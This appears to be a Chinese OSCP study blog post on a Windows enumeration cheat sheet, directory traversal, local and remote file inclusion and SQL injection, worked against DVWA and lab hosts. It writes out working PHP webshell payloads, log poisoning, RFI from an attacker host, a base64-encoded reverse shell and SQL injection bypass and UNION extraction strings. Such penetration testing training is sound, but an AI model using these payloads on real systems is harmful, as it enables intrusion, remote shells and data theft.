注册表路径: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE

用途: 磁盘加密配置

20.2. Windows Defender

配置路径: C:\ProgramData\Microsoft\Windows Defender\

日志路径: C:\ProgramData\Microsoft\Windows Defender\Support\

PowerShell命令:

1Get-MpPreference
2Get-MpComputerStatus

20.3. 审计策略

查看命令:

1auditpol /get /category:*

用途: 了解系统审计配置

21. 证书和加密

21.1. 证书存储

路径: C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\

查看命令:

1Get-ChildItem -Path Cert:\LocalMachine\My
2Get-ChildItem -Path Cert:\CurrentUser\My

用途: 查看安装的SSL/TLS证书,可能揭示服务域名

22. 备份和恢复

22.1. Windows Server Backup

配置路径: 通过Windows Server Backup管理

日志路径: 事件查看器中的 Microsoft-Windows-Backup

用途: 可能包含敏感文件路径和配置信息

安全建议

访问控制: 严格限制对注册表、配置文件和系统目录的访问权限
审计日志: 启用详细的审计日志记录,监控对敏感文件和注册表的访问
防火墙配置: 使用Windows防火墙或第三方防火墙限制入站和出站连接
定期审计: 定期检查开放的端口、运行的服务和启动项
最小化服务: 禁用或删除不必要的服务和功能
补丁管理: 及时应用Windows更新和安全补丁
加密敏感数据: 使用BitLocker加密磁盘,加密敏感配置文件
网络分段: 使用VLAN和防火墙规则隔离敏感服务
监控异常: 使用SIEM工具监控异常的端口扫描和服务访问
强化RDP: 修改RDP默认端口,使用网络级身份验证(NLA),限制访问IP

常见Windows服务端口速查表

服务	默认端口	协议	说明
HTTP	80	TCP	Web服务
HTTPS	443	TCP	加密Web服务
FTP	21	TCP	文件传输
FTPS	990	TCP	加密FTP
SSH	22	TCP	安全Shell
Telnet	23	TCP	远程终端
SMTP	25	TCP	邮件发送
DNS	53	TCP/UDP	域名解析
POP3	110	TCP	邮件接收
IMAP	143	TCP	邮件接收
SNMP	161	UDP	网络管理
LDAP	389	TCP	目录服务
LDAPS	636	TCP	加密LDAP
SMB/CIFS	445	TCP	文件共享
SQL Server	1433	TCP	数据库
MySQL	3306	TCP	数据库
PostgreSQL	5432	TCP	数据库
RDP	3389	TCP	远程桌面
WinRM	5985/5986	TCP	Windows远程管理
Kerberos	88	TCP/UDP	身份验证
Global Catalog	3268/3269	TCP	AD目录服务
Tomcat	8080/8443	TCP	Web应用服务器

Day27 目录遍历、文件包含与SQL注入漏洞

Tue, 21 Oct 2025 13:57:15 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

目录遍历漏洞（Directory Traversal Vulnerabilities）

目录遍历漏洞，也称为路径遍历漏洞，允许攻击者未经授权访问应用程序内的文件，或访问通常无法通过 Web 接口访问的文件（例如 Web 根目录之外的文件）。当输入验证不当时，就会出现此漏洞，从而使攻击者能够使用"../“或”.."字符来操控文件路径。

这些攻击可能会暴露敏感信息，但==不会在应用程序服务器上执行代码==。在某些用特定编程语言编写的应用程序服务器上，目录遍历攻击可用于帮助促成文件包含攻击。尽管识别这两类漏洞的技术有所重叠，但它们的最终结果不同。

识别和利用目录遍历

搜索目录遍历漏洞始于检查 URL 查询字符串和表单主体，寻找看似文件引用的值，最常见的迹象是 URL 查询字符串中的文件扩展名。

一旦识别出一些可能的候选参数，我们就可以修改这些值，尝试引用系统上任何用户都应可读的文件，例如 Linux 上的 /etc/passwd或 Windows 上的 c:\boot.ini。

让我们回到 Windows 10 实验机上的示例应用程序来演示此漏洞。请确保在继续之前已启动 Apache 和 MySQL。

从主 Web 索引页面，点击"Menu"显示示例菜单：

点击"Menu"链接后，URL 会更新并包含一个名为 file的参数，其值为"current_menu.php"。参数值中出现文件扩展名通常是一个很好的迹象，表明我们应该进一步调查，因为它暗示正在从其他资源包含文本或代码。大多数目录遍历漏洞并不如此明显，但有相当数量的旧版 PHP 应用程序以类似方式加载页面。

在不知道代码具体实现的情况下，我们可以通过更改 file参数的值开始试探。如果我们将"current_menu.php"更改为"old.php"之类的值，我们会得到一个错误而不是菜单：

请注意，错误消息表明服务器未能打开要包含的文件，并返回了完整的文件路径。这表明我们很可能可以通过操纵 file参数来控制页面中呈现的内容。如果我们之前不知道目标是 Windows 主机，这个错误消息也会泄露这一点。它还包含了应用程序的源目录信息。操作系统信息在利用目录遍历漏洞时至关重要。

由于我们知道应用程序运行在 Windows 系统上，让我们更新我们的载荷，以 Windows 的 hosts 文件为目标。在 Windows 系统上，这是一个有用的目标文件，因为它稳定可靠且任何用户都可访问。

让我们将参数值更改为 c:\windows\system32\drivers\etc\hosts并提交 URL：

练习

利用该目录遍历漏洞，读取你的靶机上的任意文件。这里使用dvwa靶场来演示找到?page= 的注入点后就尝试输入 page=../../../../../etc/passwd 就能目录遍历到根目录读取用户配置文件。这里输入多个../ 是为了利用Linux的特性，../ 表示回到上一级目录。因为此时我们不知道这个网页的php在Linux系统中的哪个目录，用多个../ 能确保返回到根目录/ 然后再从根目录访问文件的绝对目录。这个靶场的特性没有过滤/字符，所以直接输入page=/etc/passwd 也是能访问成功的。登录到靶机的docker环境中可以看到etc下面有这些文件（做参考），比较有用的就是passwd, hosts, hostname, shadow 等，这几个文件一般在Linux服务器上都普遍存在，其中要注意的是shadow文件可能因为权限问题无法读取，需要提权后再读。找到dvwa靶场的网页文件，发现除了页面上展示的1，2，3文件，还有一个file4.php 文件在页面上访问可以看到4的内容，提示我们这个就算是找到靶场的隐藏文件了。值得注意的是，靶场对file4.php的内容是直接渲染的，渲染成php文件在页面中。而对其他文件，etc/passwd 和根目录下一个.sh 文件则是直接显示文字内容，没有渲染也没有执行sh的命令。这是因为这个靶场演示的还是文件包含，文件包含与目录遍历的区别就是文件包含能够直接执行或者渲染文件要做的内容，而目录遍历只能看看。通常，如果找到一个目录遍历的洞之后，配合文件上传之类的漏洞上传了一句话木马发现木马执行不成功，或者在蚁剑中怎么也连不上，就要考虑这个注入点只是目录遍历而没有文件包含，文件==只是作为文字内容显示，而不能执行其内容==。此时就要考虑在找找有没有文件包含的洞，让上传的马跑起来。

文件包含漏洞（File Inclusion Vulnerabilities）

与仅显示文件内容的目录遍历不同，文件包含漏洞允许攻击者将文件包含到应用程序的运行代码中。要真正利用文件包含漏洞，我们不仅需要能够执行代码，还必须能够将shell载荷写入某个地方。

本地文件包含(LFI Local File Inclusion) 发生在被包含的文件从同一Web服务器加载时。

远程文件包含(RFI Remote File Inclusion) 发生在从外部源加载文件时。这些漏洞通常出现在PHP应用程序中，但也可能出现在其他编程语言中。

这些漏洞的利用取决于应用程序编写的编程语言和服务器配置。对于PHP来说，语言运行时的版本和Web服务器配置，特别是php.ini中的值(如register_globals和allow_url_wrappers)，对这些漏洞的利用方式有着重大影响。

请注意，目录遍历漏洞通常与LFI结合使用，特别是用于指定LFI载荷中使用的文件。

识别文件包含漏洞

文件包含漏洞的发现方式与目录遍历相同。我们必须找到可以操纵的参数，并尝试使用它们来加载任意文件。然而，文件包含更进一步，我们尝试在应用程序中==执行文件的内容==。

我们还应该检查这些参数是否容易受到远程包含(RFI)的攻击，方法是将它们的值更改为URL而不是本地路径。由于现代PHP版本的默认配置禁用了远程URL包含(这是执行远程代码所需的关键功能)，我们不太可能找到RFI漏洞。然而，我们仍应测试RFI，因为它们通常比LFI更容易利用。

我们可以使用Netcat、Apache或Python来处理请求，就像我们在XSS中所做的那样。我们可能需要尝试在不同端口上托管载荷，因为目标服务器发起的任何远程连接都可能受到内部防火墙或路由规则的限制。可能需要一些试错。

利用本地文件包含(LFI)

一个示例应用程序，我们将从目录遍历攻击中断的地方继续，查看menu.php的源代码以明确我们正在处理的内容：

1<?php
2$file = $_GET["file"];
3include $file; ?>

应用程序从请求查询字符串中读取file参数，然后将该值与include语句一起使用。这意味着应用程序将执行指定文件中的任何PHP代码。如果应用程序使用fread打开文件并使用echo显示内容，文件中的任何代码都将被显示而不是执行。

如果我们能够以某种方式将PHP代码写入本地文件，我们可能能够将此漏洞推进到远程代码执行。由于我们无法将文件上传到服务器，我们有哪些选择？

污染日志文件

我们可以尝试通过日志文件投毒将代码注入服务器。大多数应用服务器会记录所有请求的URL。我们可以利用这一点，提交包含PHP代码的请求。一旦请求被记录，我们就可以在LFI载荷中使用日志文件。

首先，注意整个载荷是用PHP编写的：它以<?php开始，以?>结束。PHP载荷的主体是一个简单的echo命令，它将输出打印到页面。这个输出首先被包裹在<pre> HTML标签中，这些标签保留结果中的任何换行符或格式。接下来是函数调用本身，shell_exec，它将执行操作系统命令。最后，操作系统命令通过_GET['cmd']从GET请求的"cmd"参数中检索。这一行PHP代码将允许我们通过查询字符串指定操作系统命令，并在浏览器中输出结果。

现在让我们发送该载荷：

1kali@kali:~$ nc -nv 10.11.0.22 80
2(UNKNOWN) [10.11.0.22] 80 (http) open
3<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
4HTTP/1.1 400 Bad Request

尽管出现"Bad Request"错误(因为我们没有发出有效的HTTP请求)，我们可以通过检查Windows 10实验机器上的Apache日志文件来验证请求已提交。

我们可以通过打开apache\logs\access.log或使用XAMPP控制面板（Windows）来查看这些日志。

我们的载荷应该在日志文件末尾附近找到：

10.11.0.4 - - [30/Nov/2019:13:55:12 -0500]
"GET /css/bootstrap.min.css HTTP/1.1" 200 155758 "http://10.11.0.22/menu.php?file=\\Windows\\System32\\drivers\\etc\\hosts" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

10.11.0.4 - - [30/Nov/2019:13:58:07 -0500] "GET /tacotruck.php HTTP/1.1" 200 1189 "http://10.11.0.22/menu.php?file=/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"

由于我们的载荷已被记录，我们可以尝试LFI执行。

LFI代码执行

接下来，我们将使用LFI漏洞来包含包含我们PHP载荷的Apache access.log文件。我们知道应用程序正在使用include语句，因此包含文件的内容将作为PHP代码执行。

我们将构建一个URL，其中包括日志的位置以及要执行的命令(ipconfig)作为cmd参数的值：

http://10.11.0.22/menu.php?file=\path\apache\logs\access.log&cmd=ipconfig

一旦URL发送到Web服务器，输出应该如下所示：

如果一切按预期工作，页面底部应该包括ipconfig的输出。

那么到底发生了什么？由于应用程序的PHP include语句和我们指定要包含哪个文件的能力，被污染的access.log文件的内容被网页执行了。

PHP引擎反过来运行日志文件文本中的<?php echo shell_exec($_GET['cmd']);?>部分(我们的载荷)，cmd变量的值为"ipconfig"，本质上在目标上运行ipconfig并显示输出。日志文件中的其他行只是被显示，因为它们不包含有效的PHP代码。

练习

通过使用LFI攻击获得代码执行
使用代码执行获得完整的shell

日志文件污染的方法，但是这个dvwa没成功，所以这次用靶场的文件上传功能演示LFI。

远程文件包含(RFI)

远程文件包含(RFI)漏洞不如LFI常见，因为服务器必须以非常特定的方式配置，但它们通常更容易利用。例如，PHP应用程序必须将allow_url_include设置为"On"。旧版本的PHP默认开启此选项，但较新版本默认为"Off"。如果我们可以强制Web应用程序加载远程文件并执行代码，我们在创建利用载荷方面就有更多的灵活性。

让我们看一个RFI漏洞的例子。之前演示的LFI漏洞也容易受到RFI攻击。考虑以下情况：

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

这个请求将强制PHP Web服务器尝试从我们的Kali攻击机器包含一个远程文件。我们可以通过在Kali机器上启动netcat监听器来测试这一点，然后在Windows 10目标上提交URL：

1kali@kali:~$ sudo nc -nvlp 80
2listening on [any] 80 ...
3connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 50324
4GET /evil.txt HTTP/1.0
5Host: 10.11.0.4
6Connection: close

输出显示，当提交URL时，Windows 10机器确实连接到我们的Kali机器，试图检索evil.txt文件。如果文件被检索到，它将进一步尝试包含并执行它。

虽然这是一个简单的例子，但URL是有效的，过程是有效的，本质上允许我们加载并执行托管在远程Web服务器上的任何文件。

RFI技巧

空字节绕过：旧版本的PHP存在一个漏洞，其中空字节(%00)将终止任何字符串。这个技巧可用于绕过服务器端添加的文件扩展名，对文件包含很有用，因为它防止文件扩展名被视为字符串的一部分。换句话说，如果应用程序读取参数并向其追加".php"，在参数中传递的空字节有效地结束字符串而不带".php"扩展名。这使攻击者在文件包含漏洞中可以加载的文件方面具有更大的灵活性。 问号技巧：RFI载荷的另一个技巧是以问号(?)结尾，将服务器端添加到URL的任何内容标记为查询字符串的一部分。

要查看实际效果，我们可以设置Apache服务器来托管恶意的evil.txt文件，其中包含我们在日志投毒攻击中使用的相同PHP命令shell。创建文件后，我们将快速重启Apache：

1kali@kali:/var/www/html$ cat evil.txt
2<?php echo shell_exec($_GET['cmd']); ?>
3
4kali@kali:/var/www/html$ sudo systemctl restart apache2

一旦文件就位且我们的Web服务器正在运行，我们可以将RFI攻击URL发送到Windows 10机器上的易受攻击的Web应用程序，看看我们的代码是否执行：

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig

Webshell说明

Webshell是一小段软件，提供基于Web的命令行界面，使执行命令更容易、更方便。webshell有很多类型，Kali在/usr/share/webshells中包含了几个，用多种常见的Web应用程序编程语言编写。与往常一样，在使用这些文件之前请查看其内容。基于这些简单示例的成功，我们可以使用Apache(或其他HTTP服务器)为RFI托管这些shell，扩展我们的能力。

现在我们可以在服务器上执行代码，借助Kali Linux附带的webshell，从代码执行到获得shell应该是一件简单的事情。

练习

利用Web应用程序中的RFI漏洞并获得shell
使用Kali附带的webshell之一在Windows 10目标上获得shell

Kali 自带了一些php反弹的代码，只要使用下面的命令搜索复制到当前文件夹，然后修改ip和端口，在kali上启动一个简单的http服务，确保ip地址可以访问，靶机的all_url_include选项开启，就可以直接访问kali上的php弹回shell了

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.141';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php
3python -m http.server
4rlwrap -cAr nc -nlvp 4777
5# 网页访问
6http://192.168.224.1:8888/vulnerabilities/fi/?page=http://172.168.169.141:8000/php-reverse-shell.php

扩展你的技能库

既然我们已经了解了基础知识，让我们看看扩展技能库的一些方法。

首先，让我们看看一些Apache的替代方案。

Kali包含几个可以创建HTTP服务器的工具。如果我们需要在任意端口上快速建立HTTP服务器，这特别有用。

注意：以下示例使用注册端口，但如果我们以root用户权限运行命令，我们也可以在系统端口上运行服务器。

HTTP服务器替代方案

Python 2.x

例如，我们可以在Python 2.x中在任意端口上启动HTTP服务器，通过设置-m SimpleHTTPServer来设置所需的模块，7331来设置TCP端口：

1kali@kali:~$ python -m SimpleHTTPServer 7331
2Serving HTTP on 0.0.0.0 port 7331 ...

Python 3.x

Python 3.x的语法略有不同，因为模块名称不同：

1kali@kali:~$ python3 -m http.server 7331
2Serving HTTP on 0.0.0.0 port 7331 (http://0.0.0.0:7331/) ...

这两个命令都将启动HTTP服务器，并从当前工作路径托管任何文件或目录。

PHP

PHP包含一个内置的Web服务器，可以使用-S标志后跟要使用的地址和端口来启动：

1kali@kali:~$ php -S 0.0.0.0:8000
2PHP 7.3.8-1 Development Server started at Wed Aug 28 12:59:52 2019
3Listening on http://0.0.0.0:8000
4Document root is /home/kali
5Press Ctrl-C to quit.

Ruby

我们还可以使用Ruby"一行命令"启动HTTP服务器。该命令需要几个标志，包括：

-run：加载un.rb，其中包含常见Unix命令的替代品
-e httpd：运行HTTP服务器
.：从当前目录提供内容
-p 9000：设置TCP端口

1kali@kali:~$ ruby -run -e httpd . -p 9000
2[2019-08-28 12:44:14] INFO WEBrick 1.4.2
3[2019-08-28 12:44:14] INFO ruby 2.5.5 (2019-03-15) [x86_64-linux-gnu]
4[2019-08-28 12:44:14] INFO WEBrick::HTTPServer#start: pid=1367 port=9000

BusyBox

我们还可以使用busybox(“嵌入式Linux的瑞士军刀”)运行HTTP服务器：

httpd：作为函数
-f：交互式运行
-p 10000：在TCP端口10000上运行

1kali@kali:~$ busybox httpd -f -p 10000

要停止任何这些服务器，我们只需按下Ctrl+C。

PHP包装器

PHP提供了几个协议包装器(protocol wrappers)，我们可以使用它们来利用目录遍历和本地文件包含漏洞。这些过滤器在尝试通过LFI漏洞注入PHP代码时为我们提供了额外的灵活性。

我们可以使用data包装器将内联数据嵌入为URL的一部分，使用明文或base64编码的数据。当我们无法用PHP代码污染本地文件时，此包装器为我们提供了替代载荷。

使用Data包装器

让我们仔细看看如何使用data包装器。我们以"data:“开始，后跟数据类型。在这种情况下，我们将使用"text/plain"表示明文。接下来是逗号，标记内容的开始，在本例中是"hello world”。当我们把它们放在一起时，我们得到"data:text/plain,hello world"。

我们已经知道菜单页面容易受到LFI攻击。如果我们使用data包装器提交载荷，应用程序应该将其视为常规文件并将其包含在页面中。让我们通过提交以下URL并检查结果来验证这是否有效：

http://10.11.0.22/menu.php?file=data:text/plain,hello world

正如预期的那样，应用程序将data包装器视为文件并将其包含在页面中，显示我们的"hello world"字符串。

使用Data包装器执行PHP代码

既然明文data包装器有效，让我们看看我们能走多远。我们知道这个页面上存在LFI漏洞，之前的例子证明我们可以使用data包装器注入内容。让我们用一些PHP代码替换"hello world"，看看它是否执行。我们将使用shell_exec运行dir命令，包裹在PHP标签中。那么，URL看起来像这样：

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

我们在data包装器中包含的PHP代码在服务器端执行，生成了目录列表。我们现在可以在不操纵任何本地文件的情况下利用LFI。

练习

使用PHP包装器利用LFI漏洞
使用PHP包装器在Windows 10实验机器上获得shell

 1# 测试命令可用
 2http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20echo%20shell_exec(%22whoami%22)%20?%3E
 3
 4# 检查可用的命令
 5http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20echo%20shell_exec(%22which%20bash%20sh%20python%20perl%20nc%20netcat%22);%20?%3E
 6----
 7/bin/bash /bin/sh /usr/bin/perl
 8
 9# 检查PHP禁用函数 
10http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,<?php echo ini_get("disable_functions"); ?>
11
12# 查看phpinfo
13http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20phpinfo();%20?%3E
14
15# 读取源码
16http://192.168.224.1:8888/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php

方法1 反弹shell

使用更简单但正确的反向Shell 创建简化版（一次性URL）

 1cat > simple_shell.php << 'EOF'
 2<?php
 3$sock=fsockopen("172.168.169.141",4777);
 4$proc=proc_open("/bin/sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);
 5?>
 6EOF
 7
 8base64 -w 0 simple_shell.php
 9PD9waHAKJHNvY2s9ZnNvY2tvcGVuKCIxNzIuMTY4LjE2OS4xNDEiLDQ3NzcpOwokcHJvYz1wcm9jX29wZW4oIi9iaW4vc2giLGFycmF5KDA9PiRzb2NrLDE9PiRzb2NrLDI9PiRzb2NrKSwkcGlwZXMpOwo/Pgo=
10
11# 网页访问
12http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain;base64,PD9waHAKJHNvY2s9ZnNvY2tvcGVuKCIxNzIuMTY4LjE2OS4xNDEiLDQ3NzcpOwokcHJvYz1wcm9jX29wZW4oIi9iaW4vc2giLGFycmF5KDA9PiRzb2NrLDE9PiRzb2NrLDI9PiRzb2NrKSwkcGlwZXMpOwo/Pgo=

方法2：写入shell后LFI

1# 查看目录
2http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20system(%22ls%20-la%20/var/www/html/vulnerabilities/fi/%22);%20?%3E
3# 写入shell
4http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,<?php file_put_contents("shell.php","<?php system(\$_GET['c']); ?>"); ?>
5http://192.168.224.1:8888/vulnerabilities/fi/shell.php?c=id

Sql注入

SQL 注入是一种常见的 Web 应用程序漏洞，它是由于未经过滤的用户输入被插入到查询中，然后传递给数据库执行而造成的。查询用于与数据库交互，例如插入或检索数据。如果我们可以注入恶意输入到查询中，我们就能"突破"开发人员编写的原始查询，并引入我们自己的恶意操作。这类漏洞可能导致数据库信息泄露，根据环境的不同，可能导致服务器完全被攻陷。

在本节中，我们将在 PHP/MariaDB 环境下研究 SQL 注入攻击。虽然不同环境的概念是相同的，但在攻击过程中使用的语法可能需要更新，以适应不同的数据库引擎或脚本语言。

注意： MariaDB 与 MySQL 非常相似。实际上，它起源于 MySQL 的一个分支。虽然存在一些细微差别，但大多数差别对攻击者来说并不重要。

基本 SQL 语法

结构化查询语言（SQL）是用于与关系数据库交互的主要语言。虽然 SQL 有标准语法，但大多数数据库软件包都有实现上的变化。然而，基础语法通常是相同的。让我们先了解一些基本的 SQL 概念和语法，然后再进行漏洞利用。

关系数据库由一个或多个表组成，每个表有一个或多个列。表中的每个条目称为行。

在大多数情况下，我们将处理查询。查询是对数据库引擎的指令，我们使用它们来检索或操作数据库中的数据。SELECT 查询是最基本的交互：

1SELECT * FROM users;

我们可以将列表查询解释为"显示 users 表中的所有列和记录"。SELECT 命令的第一个参数是列，星号是一个特殊字符，表示"所有"。

我们还可以使用 WHERE 子句为查询引入条件子句：

1SELECT user FROM users WHERE user_id=1;

我们可以将查询解释为"显示 users 表中的 user 字段，仅显示 id 为 1 的记录"。

这些只是一些基础知识。我们还可以在表中 INSERT（插入）、UPDATE（更新）和 DELETE（删除）数据。我们在这里不会涵盖这些语句，但在展示如何利用 SQL 注入时，我们会根据需要介绍其他 SQL 语法。

识别 SQL 注入漏洞

在寻找 SQL 注入漏洞之前，我们必须首先识别数据可能通过数据库传递的位置。身份验证通常由数据库支持，根据 Web 应用程序的性质，其他区域（包括电子商务网站上的产品或论坛上的消息线程）通常需要数据库交互。

1http://192.168.224.1:8888/vulnerabilities/sqli/?id=1&Submit=Submit#

我们可以使用单引号（’）作为简单检查潜在 SQL 注入漏洞的方法，SQL 使用单引号作为字符串分隔符。如果应用程序没有正确处理这个字符，很可能会导致数据库错误，并可能表明存在 SQL 注入漏洞。知道了这一点，我们通常通过在每个我们怀疑可能将其参数传递给数据库的字段中输入单引号来开始攻击。在进行黑盒测试时，我们需要使用这种试错方法。

如果我们能够访问应用程序的源代码，我们可以检查它是否存在通过字符串连接构建的 SQL 查询。在 PHP 中，这可能看起来像以下内容：

1$query = "select * from users where id = '$id';"

如果用户数据以任何方式包含在 SQL 语句中而没有经过清理，发生 SQL 注入的可能性非常高。让我们通过一些例子进一步分析。在正常登录中，当提交“1”作为查询的要素时，实际在数据库中执行的代码如下所示：

1$query = "select * from users where id = '1';"

Burp抓包后还可以直接发送到intruder模块配合sql注入字典直接测试。

返回数据比较长的都是注入成功有内容的，可以注入的。

身份验证绕过

身份验证绕过是利用 SQL 注入漏洞的经典示例，展示了恶意用户操纵数据库的危险性。考虑上一节中的代码示例。如果我们能够将自己的代码注入到 SQL 语句中，我们如何能够以有利于我们的方式修改查询？

这是正常的使用场景：合法用户向应用程序提交他们的查询ID，用户名和密码。应用程序使用这些值查询数据库。SQL 语句在 where 子句中使用 and 逻辑运算符。因此，数据库只会返回具有给定用户名和匹配密码的用户记录。

正常的 SQL 查询如下所示：

1select * from users where id = '1';

如果我们控制作为 $id 传入的值，我们可以通过提交 1' or 1=1;# 作为我们的用户名来破坏查询的逻辑，这将创建如下查询：

1select * from users where id = '1' or 1=1;#';

井号字符（#）是 MySQL/MariaDB 中的注释标记。它有效地删除了语句的其余部分，所以我们剩下：

1select * from users where id = '1' or 1=1;

SQL中单引号和井号可以作为注释和分段，所以如果输入万能密码 1 ’ or 1=1;# 的话。

可以看到 1‘ 和原本查询语句开头的 id = ’ 组成了一个完整的语句，而此时又带入了or 后面的内容，为了不让原本的结尾的 ‘;中的引号引起语法错误，使用了#注释掉后面的内容，所以# 号后面被SQL数据库视为注释内容没有执行，所以结尾的引号不会引起报错，而我们又成功执行了 or 1=1;的内容。

我们可以将其解释为"显示id为 1 或 1 等于 1 的用户的所有列和行"。由于"1=1"条件始终评估为真，因此将返回所有行。简而言之，通过引入 or 子句和"1=1"条件，该语句将返回 users 表中的所有记录，创建一个有效的"密码检查"。

这足以绕过身份验证吗？这取决于情况。我们已经操纵查询返回 users 表中的所有记录。应用程序代码决定接下来会发生什么。某些编程语言具有查询数据库并期望单个记录的函数。如果这些函数获得多行，它们将生成错误。其他函数可能可以很好地处理多行。在没有应用程序源代码或使用试错法的情况下，我们无法知道会发生什么。

如果当我们的 payload 返回多行时遇到错误，我们可以使用 LIMIT 语句指示查询返回固定数量的记录：

1select * from users where id = '1' or 1=1 LIMIT 1;#

为了试验这些查询及其对数据库的影响，我们可以使用 MySQL 用户名和密码直接连接到靶机的数据库，并直接执行 SQL 语句：

假如是在登录界面，而我们不知道密码的情况下，可以用这个万能密码和LIMIT语法只返回第一个用户（一般就是admin管理员）的用户名和密码，通过包含"or 1=1 LIMIT 1;“子句并注释掉查询的其余部分来欺骗应用程序让我们进入。我们不确切知道查询的样子，但"or"子句将评估为真，因此会导致查询返回记录。我们将包含"LIMIT"子句以保持简单并仅返回一条记录。我们将在"username"字段中提交我们的 payload，如果我们成功操纵了查询，我们应该获得一个有效的已认证会话。

如何防止 SQL 注入？ 一个天真的方法可能是在清理用户输入时删除所有单引号字符。然而，有时单引号应该被视为有效输入，例如姓氏。最好的方法是使用参数化查询，也称为预处理语句（prepared statements）。此功能允许开发人员在其 SQL 语句中放置参数或占位符。然后将用户输入与语句一起提供，数据库将值绑定到语句，在 SQL 语句代码和数据值之间创建一个分离层。这可以防止用户提供的数据操纵 SQL 代码。大多数主要数据库系统和编程语言都支持预处理语句。

📝 注意

下面的内容只作为理论查看，教材部分命令不再适用新的环境。推荐看专题[[sqli-labs 靶场合集 WP|sqli-labs]] 练习，搞懂所有的SQL操作。

枚举数据库

我们还可以使用 SQL 注入攻击来枚举数据库。当我们开始构建更复杂的 SQL 注入 payload 时，我们需要这些信息。例如，如果我们要从列和表中提取数据，我们需要知道列名和表名。这有助于我们执行更精确的数据提取。

这会导致 SQL 语法错误，表明存在潜在的 SQL 注入漏洞。

列数枚举

我们可以向查询添加 order by 子句进行简单枚举。此子句告诉数据库按一列或多列中的值对查询结果进行排序。我们可以在查询中使用列名或列索引。

让我们提交以下 URL：

http://10.11.0.22/debug.php?id=1 order by 1

此查询指示数据库根据第一列中的值对结果进行排序。如果查询中至少有一列，则查询有效，页面将正常呈现而不会出错。我们可以提交多个查询，每次递增 order by 子句，直到查询生成错误，表明已超过相关查询返回的最大列数。请记住，查询可以选择表中的所有列或仅选择列的子集。如果我们无法访问源查询，则需要依赖这种试错方法。

由于我们需要任意次数地迭代列号，我们应该使用 Burp Suite 的 Repeater 工具自动化查询。

为此，我们必须首先启动 Burp Suite，关闭 Intercept 并针对我们的 Windows 目标启动 URL。在 Proxy > HTTP history 中，我们应该看到我们想要重复的请求：

接下来，我们将右键单击该请求并选择 Send to Repeater。该请求现在应该显示在 Repeater 选项卡下。

请注意，该请求已进行 URL 编码，并显示为"id=1%20order%20by%201”。这不应影响我们的查询。我们可以点击 Send 提交查询：

响应看起来正常。我们可以使用 Response 窗格下的搜索框搜索"Error"，并验证响应主体中没有匹配项。

接下来，我们可以递增 order_by 子句并再次发送查询，直到收到错误消息。我们可以使用 Response 窗格下的搜索框在响应中突出显示错误：

order by 子句在第三次迭代时产生错误，我们知道查询返回包含2列的结果集。这和数据库中原本的数据8列不一样，因为网页上只选取了Firstname 和 Surname两列的数据。

理解输出的布局

现在我们知道表中有多少列，我们可以使用此信息通过 UNION 语句提取更多数据。UNION 允许我们向原始查询添加第二个 select 语句，扩展我们的能力，但每个 select 语句必须返回相同数量的列。

根据我们的枚举，我们知道查询选择了2列。但是，网页上只显示两列。我们的下一步是确定显示哪些列。如果我们使用 union 来提取有用的数据，我们希望确保数据将被显示。

我们需要更好地理解我们的输出，以便开始构建有意义的数据库提取。首先，让我们了解一下页面中显示了哪些列。我们将使用 UNION 来做到这一点。我们可以指定字面值，而不是从表中查找值。由于我们有三列，我们将在 payload 中添加"union all select 1, 2"。这个新的 select 语句将返回一行，包含三列，值为 1、2 。我们的 payload 现在是：

http://192.168.224.1:8888/vulnerabilities/sqli/?id=1+union+all+select+1%2C+2&Submit=Submit#

页面显示不同列的位置，如下所示：

我们可以看到第一列未显示，第二列显示在 name 字段中，第三列显示在 Comment 字段中。Comment 字段有更多空间，因此这是我们未来漏洞利用输出的合理位置。

提示： 如果对此有任何不清楚的地方，现在是再次直接连接到数据库并尝试这些查询的好时机。您不需要成为经验丰富的数据库管理员就能利用 SQL 注入，但您对 SQL 和这些查询正在做什么越熟悉，从 SQL 错误消息到成功利用 SQL 注入漏洞就越容易。

从数据库中提取数据

我们现在可以开始从数据库中提取信息。以下示例使用特定于 MariaDB 的命令。但是，大多数其他数据库提供类似的功能，语法略有不同。无论我们针对什么数据库软件，最好了解特定于平台的命令。

例如，要输出 MariaDB 的版本，我们可以使用此 URL：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, @@version

这应该在 name 字段中输出"2"，在 comment 字段中输出数据库版本号：

很好。看起来正在工作。接下来，让我们使用此查询输出当前数据库用户：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, user()

此查询显示正在使用 root 用户进行数据库查询：

information_schema 存储有关数据库的信息，如表名和列名。我们可以使用它来获取数据库的布局，以便我们可以制作更好的 payload 来提取敏感数据。查询如下所示：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

